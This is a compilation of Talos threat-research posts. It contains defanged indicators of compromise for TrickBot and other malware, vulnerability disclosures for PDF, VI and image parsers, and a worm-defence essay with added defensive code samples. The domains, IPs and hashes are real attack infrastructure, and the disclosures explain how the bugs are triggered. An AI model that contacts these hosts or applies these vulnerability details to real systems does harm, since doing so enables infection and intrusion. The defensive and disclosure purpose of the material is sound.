  • <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASMANCS
    • Value: ConsoleTracingMask
  • <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASAPI32
    • Value: EnableConsoleTracing
  • <HKLM>\SOFTWARE\MICROSOFT\TRACING\6838BCE2F6C831414DF831040FC14287_RASAPI32
    • Value: FileTracingMask
  • <HKLM>\Software\Microsoft\WBEM\CIMOM
  • <HKCU>\Software\Microsoft\SystemCertificates\My
  • <HKLM>\System\CurrentControlSet\Services\EventLog\System\Schannel
  • <HKLM>\Software\Microsoft\SystemCertificates\CA
  • <HKLM>\Software\Microsoft\SystemCertificates\Disallowed
  • <HKLM>\Software\Microsoft\SystemCertificates\TrustedPeople
  • <HKLM>\Software\Microsoft\SystemCertificates\trust
  • <HKLM>\Software\Microsoft\Tracing\6838bce2f6c831414df831040fc14287_RASMANCS
Mutexes
  • N/A
IP Addresses
  • 104[.]27[.]132[.]79
  • 104[.]27[.]133[.]79
Domain Names
  • ovidiystealer[.]ru
Files and or directories created
  • N/A
File Hashes

Coverage

Screenshots of Detection (images not reproduced): AMP, ThreatGrid, Umbrella

Win.Trojan.Tinba-6333828-1


Indicators of Compromise


Registry Keys
  • HKU\Software\Microsoft\Windows\CurrentVersion\Run
Mutexes
  • \BaseNamedObjects\5E60878D
IP Addresses
  • N/A
Domain Names
  • recdataoneveter[.]cc
Files and or directories created
  • %AppData%\5E60878D\bin.exe
File Hashes

Coverage

Screenshots of Detection (images not reproduced): AMP, ThreatGrid, Umbrella

Vulnerability Spotlight: Lexmark Perceptive Document Filters Code Execution Bugs


Overview

Talos is disclosing a pair of code execution vulnerabilities in Lexmark Perceptive Document Filters. Perceptive Document Filters are a series of libraries that are used to parse massive amounts of different types of file formats for multiple purposes. Talos has previously discussed in detail these filters and how they operate. The software update to resolve these vulnerabilities can be found here.


TALOS-2017-0322

Discovered by Marcin Noga of Cisco Talos

TALOS-2017-0322 / CVE-2017-2821 is a code execution vulnerability in the PDF parsing functionality of the Lexmark Perceptive Document Filters. This particular vulnerability is a use-after-free issue related to the 'GfxFont' variable and can be triggered via a specially crafted PDF document, resulting in code execution. Full details of the vulnerability are available here.

TALOS-2017-0323

Discovered by Marcin Noga & Lillyth Wyatt of Cisco Talos

TALOS-2017-0323 / CVE-2017-2822 is a code execution vulnerability in the image rendering functionality of Lexmark Perceptive Document Filters. This particular vulnerability can be triggered via a specially crafted PDF document causing a function call to a corrupted DCTStream, eventually resulting in user controlled data being written to the stack. Full details of the vulnerability are available here.

Coverage

The following Snort rules will detect exploitation attempts. Note that additional rules may be released at a future date, and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules: 42313-42314, 42399-42400




Beers with Talos EP11 - This is How the World Ends, Not with a Whimper but with Cyber Mercenaries


Beers with Talos (BWT) Podcast Episode 11 is now available.  Download this episode and subscribe to Beers with Talos:
If iTunes and Google Play aren't your thing: www.talosintelligence.com/podcast

Beers with Talos is a fast-paced, smart, and humorous podcast focused on security research topics. Staying abreast of security topics is difficult in this rapidly evolving threat landscape. Beers with Talos serves important security stories in a way that is understandable, engaging, and fun to researchers, executives, and security n00bs alike.

EP11 Show Notes: 

Better late than never? On top of being distributed all around the planet this week, we had some technical issues with our recording platform that created a nice audio jigsaw puzzle to solve. Matt’s audio remained a challenge; it is rough this week. Bear with us, the audio quality will be back to what you have come to expect next episode. If you would like to speak to the manager, please hold.

The last several years have seen a continuing surge in booters, DDOS, and combined exploit campaigns for-hire coming out of Asia and other regions. What does this tell us about the continued “professionalization” of the cyber criminal enterprise? What happens now that the playing field is leveled and launching these attacks requires nothing more than a few hundred USD in cryptocurrency?

We also discuss “hacking back” - some say it should be legal. Most people who know what they are talking about seem to think otherwise. Despite several strained analogies involving arms dealers, various calibers of ammo, and other nonsense, the crew makes a point about what it actually solves (hint: not much, especially considering the low chances of 100% certainty for most observers).

EP11 Timetable:

00:47 - Roundtable
16:13 - Booters, DDOS, and Combo Exploits, oh my!
30:45 - Hacking back - the ACDC Act (copyright 2017 Talos) and other terrible ideas
58:15 - Parting shots - How to win Powerball with this one weird timezone trick!

==========
Featuring: Craig Williams (@Security_Craig), Joel Esler (@JoelEsler), Matt Olney (@kpyke) and Nigel Houghton (@EnglishLFC).
Hosted by Mitch Neff (@MitchNeff)

Find all episodes:
http://cs.co/talospodcast

Subscribe via iTunes (and leave a review!)
http://cs.co/talositunes

Check out the Talos Threat Research Blog:
http://cs.co/talosresearch

Subscribe to the Threat Source newsletter:
http://cs.co/talosupdate

Follow Talos on Twitter:
http://cs.co/talostwitter

Give us your feedback and suggestions for topics:
beerswithtalos@cisco.com

Vulnerability Spotlight: Code Execution Vulnerability in LabVIEW

Vulnerability discovered by Cory Duplantis of Cisco Talos.

Update: 9/1/17 - National Instruments has published the following advisory

Overview


LabVIEW is a system design and development platform released by National Instruments. The software is widely used to create applications for data acquisition, instrument control and industrial automation. Talos is disclosing the presence of a potential code execution vulnerability which can be triggered by opening specially crafted VI files, the proprietary file format used by LabVIEW.

TALOS-2017-0273 code execution vulnerability (CVE-2017-2779)


The VI file format describes various systems implemented in LabVIEW. Although there is no published specification for the file format, inspecting the files shows that they contain a section named ‘RSRC’, presumably containing resource information. Modulating the values within this section of a VI file can cause a controlled looping condition resulting in an arbitrary null write. This vulnerability can be used by an attacker to create a specially crafted VI file that when opened results in the potential execution of code supplied by the attacker.

Full details of the vulnerability are available here.

National Instruments does not consider that this issue constitutes a vulnerability in their product, since any .exe-like file format can be modified to replace legitimate content with malicious content, and has declined to release a patch. Talos disagrees. There are similarities between this vulnerability and the .NET PE loader vulnerability CVE-2007-0041, which was patched in MS07-040. Additionally, many users may be unaware that VI files are analogous to .exe files and should be accorded the same security requirements.

Known vulnerable versions:
LabVIEW 2016 version 16.0

Discussion


We have previously disclosed a vulnerability in the same software. As with the previous disclosure, organisations should be aware that proprietary file formats without a published specification are nevertheless amenable to inspection to identify vulnerabilities. The consequences of a successful compromise of a system that interacts with the physical world, such as data acquisition and control systems, may be critical to safety. Organisations that deploy such systems, even as pilot projects, should be aware of the risk posed by vulnerabilities such as these and adequately protect those systems.

Coverage


The following Snort Rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort Rules: 41368-41369

Vulnerability Spotlight: Multiple Gdk-Pixbuf Vulnerabilities


Overview



Today, Talos is disclosing the discovery of two remote code execution vulnerabilities which have been identified in the Gdk-Pixbuf Toolkit. This toolkit is used in multiple desktop applications including Chromium, Firefox, GNOME thumbnailer, VLC and others. Exploiting these vulnerabilities allows an attacker to gain full control over the victim's machine. If an attacker builds a specially crafted TIFF or JPEG image and entices the victim to open it, the attacker's code will be executed with the privileges of the local user.

Details


TALOS-2017-0377 -- CVE-2017-2870

Vulnerability discovered by Marcin Noga of Cisco Talos and also independently discovered by Tobias Mueller from GDK Security.

An exploitable integer overflow vulnerability exists in the tiff_image_parse functionality of the Gdk-Pixbuf 2.36.6 toolkit. A specially crafted TIFF file can cause a heap overflow resulting in remote code execution. The vulnerability exists in the TIFF parser and only occurs if the library is compiled with the high optimization flag `-O3` (tested with clang). The toolkit contains a few `if` statements inside the `tiff_image_parse` function whose intention is to check for integer overflows. Unfortunately, the compiler recognizes these checks as relying on "Undefined Behavior" and removes them during optimization. The resulting lack of proper integer overflow checks leads to a heap overflow and can allow an attacker to execute arbitrary code.
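The block below is an added illustration, not gdk-pixbuf's code: a hypothetical sizing check written the way the post describes (signed multiply, then test the product), which an optimiser may legally delete because signed overflow is undefined behaviour, beside a replacement that checks bounds in unsigned arithmetic before multiplying and therefore survives `-O3`. Function names and the width x height x bytes-per-pixel sizing are assumptions; the safe helper covers the general case rather than only TIFF.

```c
#include <stdint.h>
#include <stdbool.h>
#include <stddef.h>
#include <stdlib.h>
#include <stdio.h>

/* Illustrative (hypothetical) check of the kind the post describes.
 * `width * height` on signed ints may overflow, which is undefined behaviour,
 * so the optimiser may assume it never happens and fold the
 * `bytes / height != width` test away entirely. Shown as an anti-pattern. */
int unsafe_image_bytes(int width, int height)
{
    int bytes = width * height;          /* may wrap: undefined behaviour */
    if (height != 0 && bytes / height != width)
        return -1;                       /* this check may be deleted at -O2/-O3 */
    return bytes;
}

/* Well-defined replacement: unsigned arithmetic, and every bound is compared
 * against the ceiling *before* the multiplication that could exceed it. */
bool image_buffer_size(uint32_t width, uint32_t height,
                       uint32_t bytes_per_pixel, size_t *out)
{
    if (width == 0 || height == 0 || bytes_per_pixel == 0)
        return false;
    if ((size_t)width > SIZE_MAX / height)
        return false;                    /* width * height would wrap */
    size_t pixels = (size_t)width * height;
    if (pixels > SIZE_MAX / bytes_per_pixel)
        return false;                    /* pixels * bpp would wrap */
    *out = pixels * bytes_per_pixel;
    return true;
}

/* Allocate only when the size check passes; a NULL return tells the caller to
 * abort the parse instead of writing decoded rows into an undersized buffer.
 * (GCC and clang also offer __builtin_mul_overflow for the same purpose.) */
unsigned char *alloc_pixels(uint32_t width, uint32_t height, uint32_t bpp)
{
    size_t n;
    if (!image_buffer_size(width, height, bpp, &n))
        return NULL;
    return calloc(1, n);
}

int main(void)
{
    size_t n = 0;
    printf("640x480x4 accepted: %d\n", image_buffer_size(640, 480, 4, &n));
    printf("oversized header accepted: %d\n",
           image_buffer_size(UINT32_MAX, UINT32_MAX, 4, &n));
    return 0;
}
```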

TALOS-2017-0366 -- CVE-2017-2862

Vulnerability discovered by Marcin Noga of Cisco Talos.

An exploitable heap-overflow vulnerability exists in the gdk_pixbuf__jpeg_image_load_increment functionality of Gdk-Pixbuf 2.36.6. A specially crafted JPEG file can cause a heap overflow resulting in remote code execution. The vulnerability exists in the JPEG parser and is based on an incorrect size calculation for the output buffer in the `gdk_pixbuf__jpeg_image_load_increment` function, which later causes the heap overflow during content conversion inside the libjpeg `null_convert` function.

Coverage


The following Snort Rules will detect exploitation attempts of these vulnerabilities. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your FireSIGHT Management Center or Snort.org.

Snort rules: 39607, 39615, 43214-43215

Back to Basics: Worm Defense in the Ransomware Age

This post was authored by Edmund Brumaghin

"Those who cannot remember the past are condemned to repeat it." - George Santayana

The Prequel


In March 2017, Microsoft released a security update for various versions of Windows, which addressed a remote code execution vulnerability affecting a protocol called SMBv1 (MS17-010). As this vulnerability could allow a remote attacker to completely compromise an affected system, the vulnerability was rated "Critical" with organizations being advised to implement the security update. Additionally, Microsoft released workaround guidance for removing this vulnerability in environments that were unable to apply the security update directly. At the same time, Cisco released coverage to ensure that customers remained protected.

The following month, April 2017, a group publishing under the moniker "TheShadowBrokers" publicly released several exploits on the internet. These exploits targeted various vulnerabilities, including those that were addressed by MS17-010 a month earlier. As is always the case, whenever new exploit code is released into the wild, it becomes a focus of research for both the information security industry and cybercriminals. While the good guys take the information and use it for the greater good by improving security, cybercriminals also take the code and attempt to find ways to leverage it to achieve their objectives, whether that be financial gain, to create disruption, etc.

Ransomware Worms


Computer worms are not a new concept. Worms are different from other malware in that they self-propagate within and between systems; for example, Conficker is a computer worm that used a Windows vulnerability to propagate (MS08-067) and dates back to 2008. In fact, Conficker is still floating around the internet spreading from vulnerable system to vulnerable system almost 10 years later. What the past has taught us is that whenever exploit code is released in the wild for vulnerabilities that are "wormable", worms will be created and distributed. While this doesn't happen often, when it does, the impact worms can have around the world is significant. In 2017, we have seen this twice so far. What is new, however, is the use of computer worms to spread ransomware and other destructive malware. Enter WannaCry and Nyetya.

WannaCry


Moving forward in time, in May 2017, we saw the introduction of WannaCry into the threat landscape. WannaCry was created as a ransomware worm, meaning that it leveraged vulnerabilities in Windows to spread itself and infect additional systems without requiring explicit user interaction. WannaCry leveraged the vulnerability addressed two months prior (MS17-010) to perform this propagation. Once systems were infected, ransomware would be installed and the system would be used to propagate the attack to other systems. This quickly led to a snowball effect, with more and more systems becoming infected and actively attempting to spread the malware. The damage created by WannaCry was global, with many organizations around the world either directly affected due to infections, or indirectly due to issues caused elsewhere by the malware.

Nyetya


Fast forwarding to June 2017, a second, more sophisticated attack leveraged the same vulnerabilities, for which security updates had been released months prior. This particular attack can be labeled as more sophisticated for a number of reasons. First, it leveraged what's known as a "supply-chain attack" as the initial vector for compromising organizations. In supply-chain attacks, the attackers take advantage of a trusted relationship between an organization and a vendor or supplier. In this case, the attackers behind Nyetya compromised a software update server used extensively by businesses and organizations in Ukraine. They leveraged the compromised server to deploy backdoored versions of the software under the guise of software updates. Once backdoored, the attackers could distribute their malware directly into the targeted environments. In this particular case, the malware caused significant system impact and leveraged multiple methods for propagating throughout the network in compromised organizations. In a similar fashion to WannaCry, this resulted in many organizations facing significant operational disruption; however, in this case, the damage was mainly focused within Ukraine.

WannaCry vs. Nyetya


There are significant differences between these two pieces of malware. As previously mentioned, Nyetya can be considered significantly more sophisticated for a number of different reasons, which are detailed in the following sections. One example of the difference in sophistication between these two worms lies in the code itself. WannaCry featured multiple bugs (including a broken scanning function) which might be indicative of differences in the skill level of the attackers who created WannaCry versus those who created Nyetya. The major differences between these two worms can be characterized by how malware was delivered, the methods of propagation used by the malware, as well as the mission objective of the attackers who distributed them.

Delivery


The delivery mechanism used by the two malware families was significantly different. WannaCry was simple: find or build a vulnerable SMBv1 server and infect it causing it to scan the internet and propagate. Nyetya was significantly more advanced. The attackers behind the Nyetya worm were able to successfully compromise a server used to distribute software updates for a piece of software used extensively within a specific geographic region. As mentioned in our blog post here, it is possible that the reason the attacker chose to expose, or make known that they had this level of access to systems within the targeted geographic region is due to them having additional comparable capabilities that may be used in the future.

Propagation


Nyetya's propagation mechanisms included the same SMBv1 capability as WannaCry plus several additional methods, including credential compromise. Rather than simply relying on the SMBv1 vulnerability, Nyetya also featured the ability to leverage PSExec and WMI. Additionally, while WannaCry was programmed to spread across both internal and external networks and contained code-level issues with the scanning functionality leading to performance deficiencies, Nyetya only propagated internally within compromised environments. It is possible that this was done to limit the impact of the malware to only the specific region or organizations being targeted.

Mission Objective


The suspected mission objectives for both of these cases were also different. With WannaCry, it seems reasonable to conclude that the malware was simply a poorly executed attempt to generate revenue through the mass deployment of ransomware. The inclusion of what is referred to as a "killswitch", a single domain designated to control the malware spread, made it easy for security researchers to stop the spread of this malware and indicates how unsophisticated the programmer(s) really were. The attacker's later movement of the bitcoins from the WannaCry bitcoin wallets also seems to further support that hypothesis. With Nyetya, the mission objective appears to have been causing operational disruption within a targeted environment. Nyetya wiping portions of the hard drive of infected systems and providing no mechanism for reversing that process also seems to support this hypothesis.

What Could Have Been Done Differently?


Getting back to the basics of information security would have been an effective means of either preventing or seriously limiting the impact of both of these threats.

Patching


WannaCry was easily avoidable for most organizations. Simply installing the security update associated with MS17-010 would have prevented a successful WannaCry infection. There have been several arguments made about whether or not this was possible on older systems still being actively used in some organizations. WannaCry's implementation of the exploit code targeting the MS17-010 vulnerability did not even run properly on most of these systems. Microsoft eventually released updates for MS17-010 for these older operating systems as well.

As has been emphasized by the security community for many years, effective patch management is a vital security control that organizations simply must implement within their environments. We have seen many attacks become successful simply because an organization failed to patch their environments. Reliable exploits for 0-day vulnerabilities are often very expensive for attackers, while patched public exploits are very cheap. Attackers simply will not typically utilize a 0-day vulnerability if they can find a cheaper means to achieve their mission objective. As an organization, in most cases if a system within your environment is compromised due to a 0-day vulnerability being exploited, that is a good indicator that you are doing everything else effectively because it means that the attacker likely could not find another cheaper avenue to breach your defenses.

Least Functionality


Only implement the system functionality required for a system to perform its intended role. Microsoft recommends disabling SMBv1 wherever it is not required; both WannaCry and Nyetya exploited the SMBv1 implementation via the MS17-010 vulnerability. Likewise, limiting access to systems and services is another vital security control. Even where SMBv1 is in use, it is rarely necessary for it to be reachable from hostile networks such as the internet, so TCP port 445 should be blocked at the perimeter. Host-based firewalls, such as the one built into Windows, can apply the same restriction on internal network segments, limiting SMB to the file servers and management hosts that actually need it.

Least Privilege


Limit the use of administrative tools such as WMI and PsExec, both of which Nyetya used for lateral movement, to the systems from which administrators actually perform management functions. Monitoring for the use of these tools across the network, while not a preventative control in itself, lets an organization quickly identify compromised systems and initiate its incident response process.

System and Network Monitoring


Computer worms typically propagate very quickly, which makes them extremely loud in most environments. In both of these cases the worm ran a scanning routine, probing TCP port 445 to find new hosts to infect. Monitoring the environment for service sweeps, that is, a single system attempting to connect to many other systems within a short period, allows early identification of compromised hosts so the issue can be contained before it causes a larger organizational impact.
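One way to implement the service-sweep monitoring described above, as an added example that is not part of the original post: a sliding-window detector over a constructed, simplified connection log (timestamp, source, destination, destination port, the fields a NetFlow or firewall export would give you). The window and threshold values are assumptions to be tuned per environment.

```python
"""Detect SMB 'service sweeps' (one source connecting to many hosts on
TCP/445 within a short window), the propagation pattern of WannaCry/Nyetya.

Added example; not Talos code.  SAMPLE_LOG is constructed: 10.0.1.20 sweeps
a /24 on 445 within a few seconds, while 10.0.1.5 does normal, slow SMB to
two file servers.  Thresholds are assumptions, not recommendations.
"""
from collections import defaultdict, deque

SAMPLE_LOG = """\
1500000000 10.0.1.5 10.0.2.10 445
1500000001 10.0.1.20 10.0.2.1 445
1500000001 10.0.1.20 10.0.2.2 445
1500000001 10.0.1.20 10.0.2.3 445
1500000002 10.0.1.20 10.0.2.4 445
1500000002 10.0.1.20 10.0.2.5 445
1500000002 10.0.1.20 10.0.2.6 445
1500000003 10.0.1.20 10.0.2.7 445
1500000003 10.0.1.20 10.0.2.8 445
1500000003 10.0.1.20 10.0.2.9 445
1500000004 10.0.1.20 10.0.2.10 445
1500000004 10.0.1.20 10.0.2.11 445
1500000030 10.0.1.5 10.0.2.11 445
1500000100 10.0.1.5 10.0.2.10 80
"""


def parse_log(text):
    """Yield (ts, src, dst, dport) tuples from whitespace-separated lines,
    skipping malformed lines rather than crashing the detector."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        ts, src, dst, dport = parts
        yield int(ts), src, dst, int(dport)


def detect_sweeps(records, port=445, window=60, threshold=10):
    """Return {src: (first_ts, max_distinct_dsts)} for every source that
    contacts at least `threshold` distinct destinations on `port` within
    `window` seconds.  A per-source deque of (ts, dst) is trimmed to the
    window on each event, so memory stays bounded for long-running input."""
    recent = defaultdict(deque)
    alerts = {}
    for ts, src, dst, dport in sorted(records):
        if dport != port:
            continue
        q = recent[src]
        q.append((ts, dst))
        while q and ts - q[0][0] > window:
            q.popleft()
        distinct = {d for _, d in q}
        if len(distinct) >= threshold:
            first, best = alerts.get(src, (q[0][0], 0))
            alerts[src] = (first, max(best, len(distinct)))
    return alerts


if __name__ == "__main__":
    for src, (first, n) in detect_sweeps(parse_log(SAMPLE_LOG)).items():
        print(f"sweep: {src} -> {n} hosts on 445 starting at {first}")
```

Only 10.0.1.20 is reported; the file-server client touches two hosts in the window and stays below threshold. In production, feed the detector from your flow collector and exclude known scanners (vulnerability management, backup) by source rather than by raising the threshold.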

Network Segmentation


Even in environments where it was simply not possible to install the MS17-010 security update, network segmentation can prevent a successful attack or limit its impact on the rest of the organization. Creating "choke-points" in communication paths not only limits the blast radius of a compromise, but also provides an ideal location to deploy network-based security controls that can stop an attack before it succeeds. As described above, the principle of least functionality dictates that at each choke-point, access controls limit communications to only what systems actually require to serve their role within the business. Flat networks, while easy to manage and maintain, afford little mitigation against an attack like WannaCry or Nyetya.
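To make the segmentation and least-functionality arguments above concrete, here is an added example (not from the original post) that estimates the blast radius of an SMB worm under a flat network versus a segmented one with choke-point rules. The inventory and policies are constructed; every host is assumed to be unpatched, and the worm is assumed to spread only over TCP/445.

```python
"""Blast radius of an SMB worm: flat network versus choke-point policy.

Added example; not Talos code.  HOSTS and the policies are constructed.
A choke-point rule is (src_segment, dst_segment, port); traffic inside a
segment never crosses a choke-point and is therefore always allowed here
(host firewalls, not segmentation, are the control for that case).
"""
from collections import deque

HOSTS = {  # constructed inventory: host -> segment
    "ws-01": "workstations", "ws-02": "workstations", "ws-03": "workstations",
    "fs-01": "fileservers",  "fs-02": "fileservers",
    "hmi-01": "ot",          "plc-gw-01": "ot",
    "adm-01": "admin",
}
SMB = 445
ANY = "*"

# Flat network: everything talks to everything.
FLAT_POLICY = [(ANY, ANY, ANY)]

# Segmented: workstations reach file servers on 445; only the admin segment
# reaches OT, file servers and workstations on 445; nothing else crosses.
SEGMENTED_POLICY = [
    ("workstations", "fileservers", SMB),
    ("admin", "fileservers", SMB),
    ("admin", "ot", SMB),
    ("admin", "workstations", SMB),
]


def allowed(policy, src, dst, port):
    """True if `src` can reach `dst` on `port` under `policy`."""
    s, d = HOSTS[src], HOSTS[dst]
    if s == d:
        return True  # same segment: no choke-point in the path
    return any(ps in (ANY, s) and pd in (ANY, d) and pp in (ANY, port)
               for ps, pd, pp in policy)


def blast_radius(policy, patient_zero, port=SMB):
    """Breadth-first spread: every host an infected host can reach on `port`
    becomes infected.  Returns the set of infected hosts."""
    infected = {patient_zero}
    queue = deque([patient_zero])
    while queue:
        src = queue.popleft()
        for dst in HOSTS:
            if dst not in infected and allowed(policy, src, dst, port):
                infected.add(dst)
                queue.append(dst)
    return infected


if __name__ == "__main__":
    for name, policy in (("flat", FLAT_POLICY), ("segmented", SEGMENTED_POLICY)):
        hit = blast_radius(policy, "ws-01")
        print(f"{name:9s}: {len(hit)}/{len(HOSTS)} hosts -> {sorted(hit)}")
```

Starting from a workstation, the flat policy loses every host; the segmented policy stops the worm at the file servers and keeps OT untouched. Starting from the admin host still reaches everything under the segmented policy, which is the least-privilege point from the previous section: the management segment needs the tightest controls on who may sit in it and what tools run there.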

Processes and Policies


It is essential that organizations have established policies and processes in place to ensure that they are prepared to respond appropriately and effectively when the unexpected happens. Disaster Recovery and Business Continuity Plans enable organizations to recover from unplanned system outages or disasters. For these processes to remain effective over time, organizations must not only have the plans in place but must test and validate them periodically to ensure they continue to meet the needs of the organization. Can your organization recover from a system outage quickly enough to meet its business needs? Is your backup strategy working, i.e. can you recover using your backups alone? These needs change over time, and testing these processes helps ensure they remain effective before an outage or disaster occurs. Incident Response is another process that should be in place and tested periodically through hunting exercises, tabletop exercises, and walkthroughs. This is the only way to truly ensure that the incident response team has the knowledge and tools necessary to respond effectively when security events occur within an environment.

Conclusion


WannaCry and Nyetya are two examples of events that resulted in many organizations around the world being significantly impacted by malware. These events underscore the need to get back to the basics from an information security perspective to ensure that organizations are adequately protected and ready to respond to disruptive events within their environments. Computer worms are nothing new; they have been around for decades. A sound, layered, defense-in-depth strategy enables organizations to prevent widespread system outages, and to detect and respond when a compromise does occur so as to minimize its impact.

The National Institute of Standards and Technology (NIST) has released Special Publication 800-53, "Security and Privacy Controls for Federal Information Systems and Organizations", which provides comprehensive guidance on recommended best practices and the selection of security controls that can be implemented to establish a sound defensive architecture within networked environments. This guidance is available from NIST's Computer Security Resource Center (csrc.nist.gov).

Threat Round Up for Aug 25 - Sep 1

Today, Talos is publishing a glimpse into the most prevalent threats we've observed between August 25 and September 1. As with previous round-ups, this post isn't meant to be an in-depth analysis. Instead, this post will summarize the threats we've observed by highlighting key behavior characteristics, indicators of compromise, and how our customers are automatically protected from these threats.

As a reminder, the information provided for the following threats in this post is non-exhaustive and current as of date of publication. Detection and coverage for the following threats is subject to updates pending additional threat or vulnerability analysis. For the most current information, please refer to your FireSIGHT Management Center, Snort.org, or ClamAV.net.

This week's most prevalent threats are:

  • Doc.Downloader.TrickBot-6336123-0
    Downloader
    Campaigns continue to distribute new TrickBot samples through malspam and document-based downloaders. This recent variant of downloader mimics account correspondence from a large financial institution, but the macro used for fetching a TrickBot sample has been stripped down to a simple deobfuscation and shell invocation.
     
  • Doc.Dropper.Agent-6336106-0
    Office Macro Downloader
    This is an obfuscated Office Macro downloader that attempts to download a malicious payload executable.
     
  • Doc.Macro.Obfuscation-6336014-0
    Office Macro
    This cluster of Office Macro documents uses the same obfuscation technique to prevent quick analysis. Manual analysis of the obfuscation technique shows many variables and instructions that are never used or evaluated, i.e. junk code.
     
  • Doc.Trojan.Agent-6336128-0
    Office Macro based downloader
    This set of downloaders uses string obfuscation in VBA to build a download command for the shell and executes it with the VBA Shell function. It was recently observed delivering TrickBot among other payloads.
     
  • Vbs.Trojan.VBSTrojan-6336102-0
    Trojan
    This Visual Basic script downloader fetches a binary from the internet and installs it on the system.
     
  • Win.Malware.Dinwod-6336124-0
    Dropper
    Dinwod is a polymorphic dropper. It copies modified versions of itself to the root directory then deletes the original file. The copies drop the payload DLL in the Windows directory, then force legitimate processes to run the payload via DLL injection.
     
  • Win.Trojan.AlmanCloud-6336008
    Trojan
    This is a Trojan. It contains many anti-debugging and anti-VM tricks to hinder dynamic analysis and detect instrumented environments. The binary may also try to register itself as a Windows service, and it modifies the hosts file. Moreover, it can infect USB drives plugged into the victim's computer and may also act as a keylogger. Finally, it contains code to contact remote servers and upload the collected information.
     
  • Win.Trojan.Cuegoe-6336130-0
    Trojan
    This is a trojan downloader. The payload varies and is unpacked inside a lengthy linear decryption routine.
     

Threats

Doc.Downloader.TrickBot-6336123-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • Global\PowerShell_CommandAnalysis_Lock_S-1-5-21-2580483871-590521980-3826313501-500
  • Outlook_Perf_Library_Lock_PID_90c
IP Addresses
  • 210[.]16[.]102[.]251
  • 216[.]239[.]32[.]21
  • 93[.]114[.]64[.]118
  • 5[.]152[.]210[.]179
  • 146[.]255[.]36[.]1
Domain Names
  • evaluator-expert[.]ro
Files and or directories created
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\bicprcv.exe
  • %AppData%\winapp\Modules\systeminfo64
  • \srvsvc
  • %TEMP%\cdqfm.bat
  • %AppData%\winapp\group_tag
  • %SystemDrive%\Documents and Settings\Administrator\Local Settings\Temp\cdqfm.bat
  • %TEMP%\bicprcv.exe
  • %AppData%\winapp\Modules\injectDll64_configs\dpost
  • %AppData%\winapp\Modules\injectDll64_configs\dinj
  • %AppData%\winapp\aganpat.exe
  • %AppData%\winapp\Modules\injectDll64
  • %AppData%\winapp\client_id
  • %AppData%\winapp\ahboqbu.exe
  • %AppData%\winapp\Modules\injectDll64_configs\sinj
File Hashes
  • 14ab690a2f5d4fd74f280804a1b59f5c5442c1280e79ee861e68a421cac80ce3
  • 2419210bdd20b352b357573e72eb82bafa801b078f25517546bd348e2e93a505
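The indicator blocks in these round-ups are defanged for safe publication, and the lists can carry sandbox noise alongside real infrastructure. As an added example (not part of the original round-up), the following Python parses a block in the format used above into re-fanged, validated indicators. The sample block is a constructed excerpt: the IP, mutex, domain and first hash are copied from the TrickBot list above, while 192.168.1.1, 999.1.1.1 and deadbeef are added to show what a blocklist export should reject.

```python
"""Parse a round-up indicator block into re-fanged, validated IoCs.

Added example; not Talos code.  SAMPLE_BLOCK is a constructed excerpt in the
round-up format (section headings followed by bulleted entries).  '[.]' is
restored to '.', IPs are validated with the standard library, non-routable
addresses (sandbox noise) are rejected rather than exported, and hashes must
be 64-hex SHA-256 strings.
"""
import ipaddress
import re

SAMPLE_BLOCK = """\
Registry Keys
  • N/A
Mutexes
  • Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2580483871-590521980-3826313501-500
IP Addresses
  • 210[.]16[.]102[.]251
  • 192[.]168[.]1[.]1
  • 999[.]1[.]1[.]1
Domain Names
  • evaluator-expert[.]ro
File Hashes
  • 14ab690a2f5d4fd74f280804a1b59f5c5442c1280e79ee861e68a421cac80ce3
  • deadbeef
"""

SECTIONS = {
    "Registry Keys": "registry", "Mutexes": "mutexes", "IP Addresses": "ips",
    "Domain Names": "domains", "Files and or directories created": "files",
    "File Hashes": "hashes",
}
SHA256 = re.compile(r"^[0-9a-f]{64}$")


def refang(value):
    """Undo the defanging used in the round-ups: '[.]' -> '.', 'hxxp' -> 'http'."""
    return value.replace("[.]", ".").replace("hxxp", "http")


def parse_block(text):
    """Return {section: [entries]} plus a 'rejected' list of
    (section, value, reason) for entries that must not be exported as-is."""
    out = {name: [] for name in SECTIONS.values()}
    out["rejected"] = []
    current = None
    for raw in text.splitlines():
        line = raw.strip()
        if line in SECTIONS:
            current = SECTIONS[line]
            continue
        if current is None or not line.startswith("•"):
            continue
        value = line.lstrip("•").strip()
        if value == "N/A":
            continue
        value = refang(value)
        if current == "ips":
            try:
                ip = ipaddress.ip_address(value)
            except ValueError:
                out["rejected"].append((current, value, "not an IP"))
                continue
            if not ip.is_global:  # RFC 1918, loopback, link-local, etc.
                out["rejected"].append((current, value, "non-routable"))
                continue
        elif current == "hashes" and not SHA256.match(value):
            out["rejected"].append((current, value, "not SHA-256"))
            continue
        out[current].append(value)
    return out


if __name__ == "__main__":
    parsed = parse_block(SAMPLE_BLOCK)
    for section in ("ips", "domains", "hashes", "mutexes"):
        print(section, parsed[section])
    print("rejected", parsed["rejected"])
```

The rejected list is the part worth reviewing by hand before anything reaches a firewall or EDR blocklist: a private address in a round-up is almost always the sandbox's own gateway or broadcast address, and blocking it internally would break the analyst's network, not the attacker's.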

Coverage


Screenshots of Detection: AMP, ThreatGrid, Umbrella, and a screenshot of the lure document (images not reproduced)



Doc.Dropper.Agent-6336106-0


Indicators of Compromise


Registry Keys
  • N/A
Mutexes
  • N/A
IP Addresses
  • 185[.]165[.]29[.]27
  • 185[.]165[.]29[.]129
Domain Names
  • oceanclubsreloaded[.]us
  • oceanfreightclubs[.]ir
Files and or directories created
  • \TEMP\New Purchase Order.xls
  • \Users\Administrator\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\40DVD2HR\OT[1].exe
  • %AppData%\Microsoft\Office\Recent\New Purchase Order.LNK
  • %AppData%\Microsoft\Office\Recent\272622119.xls.LNK
  • %TEMP%\wbfg.exe
